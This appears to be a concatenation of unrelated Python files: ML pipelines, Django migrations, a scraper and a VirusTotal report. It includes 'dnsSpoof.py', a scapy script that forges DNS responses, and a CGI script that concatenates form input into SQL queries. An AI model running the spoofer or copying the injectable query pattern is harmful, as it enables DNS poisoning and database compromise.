installed_filter = re.compile(
re.escape(out_dir) + '/target/product/[^/]+/' +
'(?:' + installed_dirs + ')')
source_filter = re.compile(
'|'.join('(?:' + re.escape(posixpath.normpath(path)) + ')'
for path in args.source_filter.split(':')))
manifest = ninja.load_manifest_from_args(args)
# Build lookup map
outs = {}
for build in manifest.builds:
for path in build.explicit_outs:
outs[path] = build
for path in build.implicit_outs:
outs[path] = build
# Compute transitive input files
outs_from_vendor_cache = {}
def _are_inputs_from_vendor(build):
# Check whether the input files are matched by source_filter first.
gen_paths = []
paths = itertools.chain(
build.explicit_ins, build.implicit_ins, build.depfile_implicit_ins)
for path in paths:
if source_filter.match(path):
return True
if out_pattern.match(path):
gen_paths.append(path)
# Check whether the input files transitively depend on source_filter.
for path in gen_paths:
if is_from_vendor(path):
return True
return False
def is_from_vendor(out_path):
matched = outs_from_vendor_cache.get(out_path, None)
if matched is not None:
return matched
build = outs.get(out_path)
if build:
matched = _are_inputs_from_vendor(build)
else:
matched = bool(source_filter.match(path))
outs_from_vendor_cache[out_path] = matched
return matched
matched_paths = [
path for path in outs
if installed_filter.match(path) and is_from_vendor(path)]
matched_paths.sort()
for path in matched_paths:
print(path)
if __name__ == '__main__':
main()
|
import torch
from braindecode import EEGClassifier
from braindecode.models import ShallowFBCSPNet
from sklearn.pipeline import Pipeline
from skorch.callbacks import EarlyStopping, EpochScoring
from skorch.dataset import ValidSplit
from moabb.pipelines.features import Resampler_Epoch
from moabb.pipelines.utils_pytorch import BraindecodeDatasetLoader, InputShapeSetterEEG
# Set up GPU if it is there
cuda = torch.cuda.is_available()
device = "cuda" if cuda else "cpu"
# Hyperparameter
LEARNING_RATE = 0.0001
WEIGHT_DECAY = 0
BATCH_SIZE = 64
SEED = 42
VERBOSE = 1
EPOCH = 5
PATIENCE = 3
# Create the dataset
create_dataset = BraindecodeDatasetLoader()
# Set random Model
model = ShallowFBCSPNet(
in_chans=1, n_classes=2, input_window_samples=100, final_conv_length="auto"
)
# Define a Skorch classifier
clf = EEGClassifier(
module=model,
criterion=torch.nn.CrossEntropyLoss,
optimizer=torch.optim.Adam,
optimizer__lr=LEARNING_RATE,
batch_size=BATCH_SIZE,
max_epochs=EPOCH,
train_split=ValidSplit(0.2, random_state=SEED),
device=device,
callbacks=[
EarlyStopping(monitor="valid_loss", patience=PATIENCE),
EpochScoring(
scoring="accuracy", on_train=True, name="train_acc", lower_is_better=False
),
EpochScoring(
scoring="accuracy", on_train=False, name="valid_acc", lower_is_better=False
),
InputShapeSetterEEG(
params_list=["in_chans", "input_window_samples", "n_classes"],
),
],
verbose=VERBOSE, # Not printing the results for each epoch
)
# Create the pipelines
pipes = Pipeline(
[
("resample", Resampler_Epoch(250)),
("braindecode_dataset", create_dataset),
("ShallowFBCSPNet", clf),
]
)
# this is what will be loaded
PIPELINE = {
"name": "braindecode_ShallowFBCSPNet",
"paradigms": ["LeftRightImagery", "MotorImagery"],
"pipeline": pipes,
}
|
#!/usr/bin/python
## -*- coding: utf-8 -*-
#
import json
#import db_conf
import cgi
import sys
import sqlite3
conn = sqlite3.connect('sqlite/hemap_core3.db')
conn.text_factory = str
c = conn.cursor()
qform = cgi.FieldStorage()
inparam = "CML"#
inparam = "GSM219392 GSM219393 GSM219394"
inparam = qform.getvalue('inparameter')
incol = "lineage_tumor_cat"#
incol = qform.getvalue('column')
#incol = "gsms"
mapsource = "hema_gsm_cluster"
if (qform.getvalue('mapsource') != None and qform.getvalue('mapsource') == "leukemia"):
mapsource = "hema_gsm_cluster_leukemia";
"""
gsm text, gse text, main_cat text, lineage_tumor_cat text, subtype_cat text, spec_cat text, cytogenetics text, clinical text, submaps text, patient text, sample_source text, sample_isolation text, notes text
"""
#select = "select " + outcols + " from hema_annotationf where " + incol + " like '%" + inparam + "%' order by gsm asc"
select = "select pt, hc.gsm from hema_annotationf ha, " + mapsource + " hc where ha.gsm = hc.gsm and " + incol + " like '%" + inparam + "%'"
if (incol == "gsms"):
ingsm = ""
for p in inparam.split(" "):
p = p.replace(" ", "")
ingsm = ingsm + "'" + p + "',"
ingsm = ingsm[:-1]
select = "select pt, hc.gsm from hema_annotationf ha, " + mapsource + " hc where ha.gsm = hc.gsm and hc.gsm in (" + ingsm + ") order by hc.gsm asc"
#c.execute("select " + outcols + " from hema_annotationf where " + incol + " like '%" + inparam + "%' order by gsm asc")
c.execute(select)
#c.execute("select pt, hc.gsm from hema_annotationf ha, " + mapsource + " hc where ha.gsm = hc.gsm and " + incol + " like '%" + inparam + "%'")
rows = c.fetchall()
print "Content-type: text/html;charset=utf-8\r\n"
pa = {}
pa['espts'] = []
pa['esgsms'] = {}
for row in rows:
pi = []
for r in range(len(row)):
col = row[r]
if (col == None):
col = ""
col = col.replace("'", "")
if (r == 0):
#"<a href=javascript:updateExperiment('" + str(row[r]) + "')>edit</a>")
pi.append(float(col.split(",")[0]))
pi.append(float(col.split(",")[1]))
#pi.append("<a href='javascript:highlightGSM(\"" + col + "\")'>" + col + "</a>")
else:
pa['esgsms'][col] = pi
pa['espts'].append(pi)
c.close()
print json.dumps(pa)
|
number=int(input("number of terms you want?"))
num1,num2=0,1
count=0
if number<=0:
print("enter positive number")
elif number==1:
print("fibonacci series up to:",number,":")
print(num1)
else:
print("fibonacci series:")
while count<number:
print(num1)
num3=num1+num2
num1=num2
num2=num3
count=count+1
|
def print_welcome_message():
print("This program is a Push-Down Automata (PDA) string simulator.")
print("Given a PDA provided as a JSON file under files/, it will generate its transition table.")
print("With this transition table, it will then loop through the provided strings and print whether it is accepted or rejected.")
def print_menu():
print("Actions:")
print("1. Loop through strings in JSON file")
print("2. Enter in string manually")
print("3. Print PDA transition table")
print("4. Move to next file in files/ directory.")
print("5. Exit program")
def print_transition_table_info(filename):
print(f"Transition table for {filename}")
print("Each cell in the table is comprised of a state to transtion on the character in the column as well as the action to perform on the stack.")
print("Ex: q1 (E/E) under column 'a', would mean to transition to state q1 on a and replace lambda with labmda.")
print("* Note: Formatting may be off on non-deterministic PDAs with many transitions on one character.")
def get_user_input():
"""
Get the user's input to perform an action
"""
ret = input("Enter action: ")
while not ret:
ret = input("Enter action: ")
return ret
def get_user_string():
"""
Gets the user's desired string
"""
ret = input("Enter in a string to test (for the empty string only press ENTER): ")
return ret
|
import tensorflow as tf
a = tf.constant([1, 2, 3, 4, 5, 6], shape=[1,6])
b = tf.constant([1,1,1,1,1,1,1,1,1,1,1,1],shape=[6,2])
c = tf.matmul(a, b)
with tf.Session() as sess:
c = sess.run(c)
print(a.eval())
print(b.eval())
print(c)
'''
PCA随机数据
import matplotlib.pyplot as plt
batch_size = 37
seed = 23455
rnd = np.random.RandomState(seed)
def generate():
#生成数据
X = [];Y = []
for i in range(30):
r = np.random.uniform(2, 6)
X.append(r)
for i in range(30):
r = np.random.uniform(5, 8)
Y.append(r)
R = []
for i in range(len(X)):
R.append([X[i],Y[i]])
np.random.shuffle(R)
return R
def printGraph(R,length):
#画图
for i in range(length):
plt.scatter(R[i][0], R[i][1], c='g')
plt.xlim(-5, 10)
plt.ylim(-5, 10)
plt.grid()
plt.show()
def PCAtransfer(Martic):
#PCA算法
#中心化
meanR = np.mean(R, axis=0)
print(meanR)
cen_R = []
for i in range(len(R)):
res = R[i] - meanR
cen_R.append(res)
print(cen_R)
printGraph(cen_R, len(cen_R))
# 求协防差矩阵
cen_Rrr = np.array(cen_R)
cov_R = np.cov(cen_Rrr.T)
print(cov_R.shape)
# 求特征值和特征向量
lambd, features = np.linalg.eig(cov_R)
print(lambd)
print(features)
# KL变换
if lambd[0] > lambd[1]:
maxlambd = 0
else:
maxlambd = 1
print(features[maxlambd])
new_R = cen_R * features[maxlambd].T
printGraph(new_R, len(new_R))
'''
|
#!/usr/bin/env python
# This code is strictly for demonstration purposes.
# If used in any other way or for any other purposes. In no way am I responsible
# for your actions or any damage which may occur as a result of its usage
# dnsSpoof.py
# Author: Nik Alleyne - nikalleyne at gmail dot com
# http://securitynik.blogspot.com
from os import uname
from subprocess import call
from sys import argv, exit
from time import ctime, sleep
from scapy.all import *
spoofedIPPkt = IP(src='1.2.3.4',dst='1.2.3.4')
spoofedUDP_TCPPacket = UDP(sport=53,dport=123)
spoofedDNSPakcet = DNS(id=1,qr=1,opcode=1,aa=1,rd=0,ra=0,z=0,rcode=0,qdcount=1,ancount=1,nscount=1,arcount=1,qd=DNSQR(qname="google.com",qtype=1,qclass=1),an=DNSRR(rrname="google.com",rdata='1.1.1.1',ttl=86400),ns=DNSRR(rrname="google.com",type=2,ttl=86400,rdata=argv[2]),ar=DNSRR(rrname="google.com",rdata='1.1.1.1'))
pckToSend = Ether()/spoofedIPPkt/spoofedUDP_TCPPacket/spoofedDNSPakcet
sendp(pckToSend,iface=argv[1].strip(), count=1)
|
# Generated by Django 2.1.5 on 2019-10-28 10:58
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('website', models.URLField(verbose_name='website')),
('sector', models.CharField(max_length=50, null=True, verbose_name='sector')),
('country', models.CharField(max_length=50, null=True, verbose_name='country')),
('symbol', models.CharField(max_length=50, null=True, verbose_name='symbol')),
('company', models.CharField(max_length=50, null=True, verbose_name='company')),
('industry', models.CharField(max_length=50, null=True, verbose_name='industry')),
('CEO', models.CharField(max_length=50, null=True, verbose_name='CEO')),
],
options={
'db_table': 'company',
},
),
migrations.CreateModel(
name='Holding',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=15, verbose_name='symbol')),
('userName', models.CharField(max_length=50, verbose_name='userName')),
('lastPrice', models.FloatField(verbose_name='lastPrice')),
('aChange', models.FloatField(verbose_name='aChange')),
('pChange', models.FloatField(verbose_name='pChange')),
('shares', models.FloatField(verbose_name='shares')),
('costBasis', models.FloatField(verbose_name='costBasis')),
('marketValue', models.FloatField(verbose_name='marketValue')),
('dGain', models.FloatField(verbose_name='dGain')),
('tGain', models.FloatField(verbose_name='tGain')),
('No', models.FloatField(verbose_name='No')),
('date', models.CharField(max_length=50, verbose_name='date')),
],
options={
'db_table': 'holding',
},
),
migrations.CreateModel(
name='Sectors',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=50, null=True, verbose_name='symbol')),
('sector', models.CharField(max_length=50, null=True, verbose_name='sector')),
],
options={
'db_table': 'sectors',
},
),
migrations.CreateModel(
name='Stocks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=15, verbose_name='symbol')),
('date', models.CharField(max_length=50, verbose_name='date')),
('start', models.FloatField(verbose_name='start')),
('high', models.FloatField(verbose_name='high')),
('low', models.FloatField(verbose_name='low')),
('close', models.FloatField(verbose_name='close')),
('volume', models.BigIntegerField(default=0, verbose_name='volume')),
('split', models.FloatField(verbose_name='split')),
('dividend', models.FloatField(verbose_name='dividend')),
('aChange', models.FloatField(verbose_name='aChange')),
('pChange', models.FloatField(verbose_name='pChange')),
],
options={
'db_table': 'stocks',
'ordering': ['-date'],
},
),
migrations.CreateModel(
name='Symbols',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=50, null=True, verbose_name='symbol')),
],
options={
'db_table': 'symbols',
},
),
]
|
# Generated by Django 3.0.5 on 2020-05-11 23:35
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('appointments', '0008_auto_20200510_1654'),
]
operations = [
migrations.RemoveField(
model_name='appointment',
name='attorney',
),
]
|
# -*- coding: utf-8 -*-
import os, logging, re, traceback, sys
import requests
import time
#
import browsercookie
#
import settings
from bs4 import BeautifulSoup
from torrequest import TorRequest
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
SESSION = requests.Session()
SESSION.cookies = browsercookie.chrome()
def _update_cookies():
""" Load cookies from Chrome """
global SESSION
SESSION.cookies = browsercookie.chrome()
def get_path_of_pdfs():
return sorted(
[os.path.join(root, filename) for root, dirnames, filenames in os.walk(settings.PDFS_PATH) for filename in
filenames if filename.endswith('.pdf') and os.path.getsize(os.path.join(root, filename)) > 0])
# Region for work with good cookies
DONT_TOUCH_KEYS_IN_COOKIES = ['SSID', 'SID', 'HSID']
def del_gs_cookies():
""" Function del google scholar cookies """
logger.debug("Start delete cookies for google.com and google scholar")
if SESSION.cookies._cookies.get('.scholar.google.com'):
del SESSION.cookies._cookies['.scholar.google.com']
logger.debug("Delete cookies for google scholar")
if SESSION.cookies._cookies.get('.google.com'):
google_cookies_keys = list(SESSION.cookies._cookies['.google.com']['/'].keys())
for key in google_cookies_keys:
if key not in DONT_TOUCH_KEYS_IN_COOKIES:
del SESSION.cookies._cookies['.google.com']['/'][key]
logger.debug("Delete cookies for google.com")
return SESSION.cookies
def get_request(url, att_file = None, using_TOR = False):
"""Send get request & return data"""
retry = settings.DEFAULT_MAX_RETRIES
while retry > 0:
try:
try:
if using_TOR:
with TorRequest(tor_app=r".\Tor\tor.exe") as tr:
response = tr.post(url=url, files = att_file, cookies = SESSION.cookies, timeout=settings.DEFAULT_TIMEOUT)
SESSION.cookies = response.cookies
else:
response = SESSION.post(url=url, files = att_file, timeout=settings.DEFAULT_TIMEOUT)
except requests.exceptions.Timeout:
logging.debug("timeout from requests")
settings.print_message("timeout from requests", 2)
raise ConnectionError("request timeout after %d seconds" % settings.DEFAULT_TIMEOUT)
except requests.exceptions.RequestException as e:
raise ConnectionError("request exception: %s" % e)
if response.status_code == 200:
return response.text
else:
raise Exception("HTTP %d - %s" % (response.status_code, response.reason))
except ConnectionError as error:
retry = retry - 1
settings.print_message("ran into connection error: '%s'" % error, 2)
logging.info("ran into connection error: '%s'" % error)
if retry > 0:
settings.print_message("retrying in %d seconds" % settings.DEFAULT_SLEEP, 2)
logging.info("retrying in %d seconds" % settings.DEFAULT_SLEEP)
time.sleep(settings.DEFAULT_SLEEP)
else:
retry = 0
del_gs_cookies()
def get_soup(url, using_TOR = False):
"""Return the BeautifulSoup for a page"""
try:
request = get_request(url, using_TOR = using_TOR)
if request == None:
logger.debug("Request is empty, don't create soup.")
return None
soup = BeautifulSoup(request, 'html.parser')
return soup
except Exception as error:
#logger.warn(traceback.format_exc())
raise
return None
def get_about_count_results(soup):
"""Shows the approximate number of pages as a result"""
title = soup.find('div', {'id': 'gs_ab_md'})
if title:
title = title.find('div', {'class': 'gs_ab_mdw'})
if title:
count_papers = title.text
if count_papers:
count_papers = count_papers.split(' ')[1].replace(',', '')
else:
count_papers = len(soup.find_all('h3', class_="gs_rt"))
try:
int(count_papers)
except:
count_papers = title.text.split(' ')[0].replace(',', '')
else:
count_papers = len(soup.find_all('h3', class_="gs_rt"))
return int(count_papers)
def get_count_from_scholar(title, using_TOR = False):
""" Search publication on Google.scholar and return count of searched papers """
url = settings.SCHOLAR_SEARCH.format("\"{}\"".format(title))
return get_about_count_results(get_soup(url, using_TOR = using_TOR)) |
D, G = map( int, input().split())
DP = [0 for i in range(G/100+1)]
for i in range(D):
p, c = map( int, input().split())
P.append(p)
C.append(c)
|
#!/usr/bin/env python3
# coding=utf-8
"""The setup script."""
from setuptools import setup, find_packages
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("HISTORY.rst") as history_file:
history = history_file.read()
version = {}
with open("./pancakes/version.py") as version_file:
exec(version_file.read(), version)
requirements = ["Click>=6.0"]
setup_requirements = ["pytest-runner"]
test_requirements = ["pytest"]
setup(
author="Michael B",
author_email="online.alias.mb@me.com",
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 2 - Pre-Aplha
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
"Development Status :: 2 - Pre-Alpha",
# Indicate who your project is intended for
"Intended Audience :: Developers",
# Pick your license as you wish (should match "license" above)
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
# Topic
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities",
],
description="Pancake making utility",
entry_points={"console_scripts": ["pancakes=pancakes.cli:main"]},
install_requires=requirements,
# Choose your license
license="MIT license",
long_description=readme + "\n\n" + history,
include_package_data=True,
keywords="pancakes",
name="pancakes",
packages=find_packages(include=["pancakes"]),
setup_requires=setup_requirements,
test_suite="tests",
tests_require=test_requirements,
url="https://github.com/gloc-mike/pancakes",
version=version['__version__'],
zip_safe=False,
)
|
import os, rasterio
import xarray as xr
import geopandas as gpd
from shapely.geometry import Point
import pandas as pd
import numpy as np
from affine import Affine
import datetime
base_path = '/atlas_scratch/malindgren/nsidc_0051'
out_dict = {}
metrics = ['freezeup_start','freezeup_end','breakup_end','breakup_start']
points_regions = ['barrow', 'chuckchi', 'beaufort', 'cb']
for points_region in points_regions:
for window_len in ['paper_weights']:
# with xr.open_dataset('/atlas_scratch/malindgren/nsidc_0051/NetCDF/nsidc_0051_sic_nasateam_1978-2017_Alaska_hann_{}.nc'.format(str(window_len))) as tmp:
# a = Affine(*eval( tmp.affine_transform )[:6]) # make an affine transform for lookups
ds_sel = {}
for metric in metrics:
# fn = '/atlas_scratch/malindgren/nsidc_0051/outputs/{}_avg_allyears_ordinal_hann_{}_climatology.tif'.format(metric, str(window_len))
fn = '/atlas_scratch/malindgren/nsidc_0051/outputs/{}_avg_daily-clim_ordinal_hann_{}.tif'.format( metric, str(window_len) )
with rasterio.open( fn ) as rst:
arr = rst.read(1)
a = rst.transform
ds_sel[metric] = arr
# read points and get their row/col locs
if points_region == 'cb':
points_fn1 = os.path.join(base_path,'selection_points','{}_points.shp'.format('chuckchi'))
points_fn2 = os.path.join(base_path,'selection_points','{}_points.shp'.format('beaufort'))
points1 = gpd.read_file( points_fn1 ).geometry.apply(lambda x: (x.x, x.y)).tolist()
points2 = gpd.read_file( points_fn2 ).geometry.apply(lambda x: (x.x, x.y)).tolist()
points = points1+points2
else:
points_fn = os.path.join(base_path,'selection_points','{}_points.shp'.format(points_region))
points = gpd.read_file( points_fn ).geometry.apply(lambda x: (x.x, x.y)).tolist()
colrows = [ ~a*pt for pt in points ]
colrows = [ (int(c),int(r)) for c,r in colrows ]
cols = [ c for r,c in colrows ]
rows = [ r for r,c in colrows ]
out_vals = {}
for metric in metrics:
out = ds_sel[metric].copy()
out[np.where(out < 0)] = np.nan # set any -9999 vals from FUBU processing to np.nan
# out = out.mean('year') # make an average
day = np.mean([ out[r,c] for c,r in colrows ]).round(0)
date = datetime.datetime(2007, 1, 1) + datetime.timedelta(int(day))
out_vals[metric] = date.strftime('%m-%d')
out_dict[window_len] = out_vals
# dump to disk
df = pd.DataFrame(out_dict)
df = df.loc[metrics] # sort the rows?
df.to_csv('/atlas_scratch/malindgren/nsidc_0051/{}_FUBU_average_date_daily-clim.csv'.format(points_region))
|
import scrape_mars
scrape = scrape_mars.news_scrape()
print(scrape)
|
import logging
log = logging.getLogger('onegov.agency')
log.addHandler(logging.NullHandler())
from onegov.agency.i18n import _
from onegov.agency.app import AgencyApp
__all__ = (
'_',
'AgencyApp',
'log',
)
|
#!/usr/bin/env python
# Author: Jin Lee (leepc12@gmail.com)
import sys
import os
import argparse
from encode_lib_common import (
log,
ls_l,
mkdir_p,
rm_f,
)
from encode_lib_genomic import (
bam_to_pbam,
)
def parse_arguments():
parser = argparse.ArgumentParser(prog='ENCODE bam to pbam',
description='')
parser.add_argument('bam', type=str,
help='Path for BAM.')
parser.add_argument('--ref-fa', type=str,
help='Path for reference fasta.')
parser.add_argument('--delete-original-bam', action='store_true',
help='Delete original BAM after conversion.')
parser.add_argument('--out-dir', default='', type=str,
help='Output directory.')
parser.add_argument('--log-level', default='INFO',
choices=['NOTSET', 'DEBUG', 'INFO',
'WARNING', 'CRITICAL', 'ERROR',
'CRITICAL'],
help='Log level')
args = parser.parse_args()
log.setLevel(args.log_level)
log.info(sys.argv)
return args
def main():
# read params
args = parse_arguments()
log.info('Initializing and making output directory...')
mkdir_p(args.out_dir)
# generate read length file
log.info('Converting BAM into pBAM...')
bam_to_pbam(args.bam, args.ref_fa, args.out_dir)
if args.delete_original_bam:
log.info('Deleting original BAM...')
rm_f(args.bam)
log.info('List all files in output directory...')
ls_l(args.out_dir)
log.info('All done.')
if __name__ == '__main__':
main()
|
{
"scan_id": "f96e0fe3e21246e3a1cae6d3f59725f2c387f040009766fdfeb11d75487d3e35-1528131725",
"resource": "f96e0fe3e21246e3a1cae6d3f59725f2c387f040009766fdfeb11d75487d3e35",
"scan_date": "2018-06-04 17:02:05",
"permalink": "https://www.virustotal.com/file/f96e0fe3e21246e3a1cae6d3f59725f2c387f040009766fdfeb11d75487d3e35/analysis/1528131725/",
"verbose_msg": "Scan finished, information embedded",
"sha1": "6b2a323ee60be14ae04df36b4a724bbcd67ba2c8",
"md5": "0c7391ea74f33c858ad04c99f188ed7a"
"sha256": "f96e0fe3e21246e3a1cae6d3f59725f2c387f040009766fdfeb11d75487d3e35",
"response_code": 1,
"positives": 0,
"total": 60,
"scans": {
"Bkav": {
"detected": false,
"version": "1.3.0.9466",
"result": null,
"update": "20180604"
},
"TotalDefense": {
"detected": false,
"version": "37.1.62.1",
"result": null,
"update": "20180604"
},
"MicroWorld-eScan": {
"detected": false,
"version": "14.0.297.0",
"result": null,
"update": "20180604"
},
"nProtect": {
"detected": false,
"version": "2018-06-04.02",
"result": null,
"update": "20180604"
},
"CMC": {
"detected": false,
"version": "1.1.0.977",
"result": null,
"update": "20180604"
},
"CAT-QuickHeal": {
"detected": false,
"version": "14.00",
"result": null,
"update": "20180604"
},
"McAfee": {
"detected": false,
"version": "6.0.6.653",
"result": null,
"update": "20180604"
},
"Malwarebytes": {
"detected": false,
"version": "2.1.1.1115",
"result": null,
"update": "20180604"
},
"VIPRE": {
"detected": false,
"version": "67028",
"result": null,
"update": "20180604"
},
"TheHacker": {
"detected": false,
"version": "6.8.0.5.3045",
"result": null,
"update": "20180531"
},
"K7GW": {
"detected": false,
"version": "10.48.27354",
"result": null,
"update": "20180604"
},
"K7AntiVirus": {
"detected": false,
"version": "10.48.27354",
"result": null,
"update": "20180604"
},
"Baidu": {
"detected": false,
"version": "1.0.0.2",
"result": null,
"update": "20180604"
},
"NANO-Antivirus": {
"detected": false,
"version": "1.0.106.22618",
"result": null,
"update": "20180604"
},
"Cyren": {
"detected": false,
"version": "6.0.0.4",
"result": null,
"update": "20180604"
},
"Symantec": {
"detected": false,
"version": "1.6.0.0",
"result": null,
"update": "20180604"
},
"ESET-NOD32": {
"detected": false,
"version": "17497",
"result": null,
"update": "20180604"
},
"TrendMicro-HouseCall": {
"detected": false,
"version": "9.950.0.1006",
"result": null,
"update": "20180604"
},
"Avast": {
"detected": false,
"version": "18.4.3895.0",
"result": null,
"update": "20180604"
},
"ClamAV": {
"detected": false,
"version": "0.99.2.0",
"result": null,
"update": "20180604"
},
"GData": {
"detected": false,
"version": "A:25.17313B:25.12413",
"result": null,
"update": "20180604"
},
"Kaspersky": {
"detected": false,
"version": "15.0.1.13",
"result": null,
"update": "20180604"
},
"BitDefender": {
"detected": false,
"version": "7.2",
"result": null,
"update": "20180604"
},
"Babable": {
"detected": false,
"version": "9107201",
"result": null,
"update": "20180406"
},
"ViRobot": {
"detected": false,
"version": "2014.3.20.0",
"result": null,
"update": "20180604"
},
"AegisLab": {
"detected": false,
"version": "4.2",
"result": null,
"update": "20180604"
},
"Rising": {
"detected": false,
"version": "25.0.0.1",
"result": null,
"update": "20180604"
},
"Ad-Aware": {
"detected": false,
"version": "3.0.5.370",
"result": null,
"update": "20180604"
},
"Sophos": {
"detected": false,
"version": "4.98.0",
"result": null,
"update": "20180604"
},
"Comodo": {
"detected": false,
"version": null,
"result": null,
"update": "20180604"
},
"F-Secure": {
"detected": false,
"version": "11.0.19100.45",
"result": null,
"update": "20180604"
},
"DrWeb": {
"detected": false,
"version": "7.0.28.2020",
"result": null,
"update": "20180604"
},
"Zillya": {
"detected": false,
"version": "2.0.0.3566",
"result": null,
"update": "20180604"
},
"TrendMicro": {
"detected": false,
"version": "10.0.0.1040",
"result": null,
"update": "20180604"
},
"McAfee-GW-Edition": {
"detected": false,
"version": "v2017.2786",
"result": null,
"update": "20180604"
},
"Emsisoft": {
"detected": false,
"version": "4.0.2.899",
"result": null,
"update": "20180604"
},
"F-Prot": {
"detected": false,
"version": "4.7.1.166",
"result": null,
"update": "20180604"
},
"Jiangmin": {
"detected": false,
"version": "16.0.100",
"result": null,
"update": "20180604"
},
"Webroot": {
"detected": false,
"version": "1.0.0.403",
"result": null,
"update": "20180604"
},
"Avira": {
"detected": false,
"version": "8.3.3.6",
"result": null,
"update": "20180604"
},
"Antiy-AVL": {
"detected": false,
"version": "3.0.0.1",
"result": null,
"update": "20180604"
},
"Kingsoft": {
"detected": false,
"version": "2013.8.14.323",
"result": null,
"update": "20180604"
},
"Arcabit": {
"detected": false,
"version": "1.0.0.831",
"result": null,
"update": "20180604"
},
"SUPERAntiSpyware": {
"detected": false,
"version": "5.6.0.1032",
"result": null,
"update": "20180604"
},
"ZoneAlarm": {
"detected": false,
"version": "1.0",
"result": null,
"update": "20180604"
},
"Avast-Mobile": {
"detected": false,
"version": "180604-04",
"result": null,
"update": "20180604"
},
"Microsoft": {
"detected": false,
"version": "1.1.14901.4",
"result": null,
"update": "20180604"
},
"AhnLab-V3": {
"detected": false,
"version": "3.12.1.20996",
"result": null,
"update": "20180604"
},
"ALYac": {
"detected": false,
"version": "1.1.1.5",
"result": null,
"update": "20180604"
},
"AVware": {
"detected": false,
"version": "1.5.0.42",
"result": null,
"update": "20180604"
},
"MAX": {
"detected": false,
"version": "2017.11.15.1",
"result": null,
"update": "20180604"
},
"VBA32": {
"detected": false,
"version": "3.12.32.0",
"result": null,
"update": "20180604"
},
"Zoner": {
"detected": false,
"version": "1.0",
"result": null,
"update": "20180604"
},
"Tencent": {
"detected": false,
"version": "1.0.0.1",
"result": null,
"update": "20180604"
},
"Yandex": {
"detected": false,
"version": "5.5.1.3",
"result": null,
"update": "20180529"
},
"Ikarus": {
"detected": false,
"version": "0.1.5.2",
"result": null,
"update": "20180604"
},
"Fortinet": {
"detected": false,
"version": "5.4.247.0",
"result": null,
"update": "20180604"
},
"AVG": {
"detected": false,
"version": "18.4.3895.0",
"result": null,
"update": "20180604"
},
"Panda": {
"detected": false,
"version": "4.6.4.2",
"result": null,
"update": "20180604"
},
"Qihoo-360": {
"detected": false,
"version": "1.0.0.1120",
"result": null,
"update": "20180604"
}
}
} |
import os
import cv2
import numpy as np
import time
import copy
import cv2
import json
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader, Dataset
from torch.optim import lr_scheduler
from torchvision import datasets
from facenet_pytorch import InceptionResnetV1, MTCNN
from PIL import Image
from torchvision import transforms
from torchvision.transforms import ToTensor, Resize, Normalize
from torchvision import utils
from torchvision import datasets, models, transforms
from tqdm import tqdm
from torch.utils.data import TensorDataset, random_split
from data_collector import DataCollector
class FaceRecognitionClassifier():
def __init__(self):
if torch.cuda.is_available():
self.device = torch.device('cuda:0')
else:
self.device = torch.device('cpu')
print(f'Recognition module is running on {self.device}')
with open('facedict.json') as json_file:
self.facedict = json.load(json_file)
self.labels_count = 3
self.pretrained_model = InceptionResnetV1(pretrained='vggface2')
self.model = None
def get_model(self):
model = ModifiedResnet(pretrained_model=self.pretrained_model, labels_count=len(self.facedict))
model.load_state_dict(torch.load('mod_resnet.pth'))
model.eval()
model.to(self.device)
self.model = model
return model
def train_classifier(self, num_epochs=50):
try:
training_data = np.load('training_data.npy', allow_pickle=True)
except:
dc = DataCollector
dc.collect_data()
training_data = np.load('training_data.npy', allow_pickle=True)
images = torch.Tensor([i[0] for i in training_data])
labels = torch.Tensor([i[1] for i in training_data])
dataset = TensorDataset(images, labels)
train_size = int(0.8 * len(dataset))
val_size = len(dataset) - train_size
train_dataset, val_dataset = random_split(dataset, [train_size, val_size])
train_loader = DataLoader(train_dataset, batch_size=32, shuffle=True)
val_loader = DataLoader(val_dataset, batch_size=32, shuffle=True)
dataloaders = {'train': train_loader, 'val': val_loader}
dataset_sizes = {'train': train_size, 'val': val_size}
for param in self.pretrained_model.parameters():
param.requires_grad = False
modified_resnet = ModifiedResnet(pretrained_model=self.pretrained_model, labels_count=len(self.facedict))
modified_resnet.to(self.device)
criterion = nn.CrossEntropyLoss()
optimizer = optim.AdamW(modified_resnet.parameters(), lr=0.001)
scheduler = lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.1)
since = time.time()
best_model_wts = copy.deepcopy(modified_resnet.state_dict())
best_acc = 0.0
best_loss = 1.0
for epoch in tqdm(range(num_epochs)):
print(f'Epoch {epoch}/{num_epochs - 1}')
for phase in ['train', 'val']:
if phase == 'train':
modified_resnet.train()
else:
modified_resnet.eval()
running_loss = 0.0
running_corrects = 0
for batch_idx, (inputs, labels) in enumerate(dataloaders[phase]):
inputs = inputs.to(self.device)
labels = labels.long().to(self.device)
#print(labels)
optimizer.zero_grad()
with torch.set_grad_enabled(phase == 'train'):
outputs = modified_resnet(inputs)
value, preds = torch.max(outputs, 1) #
loss = criterion(outputs, labels)
if phase == 'train':
loss.backward()
optimizer.step()
running_loss += loss.item() * inputs.size(0)
# print(preds)
# print(labels)
running_corrects += torch.sum(preds == labels)
if phase == 'train':
scheduler.step()
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
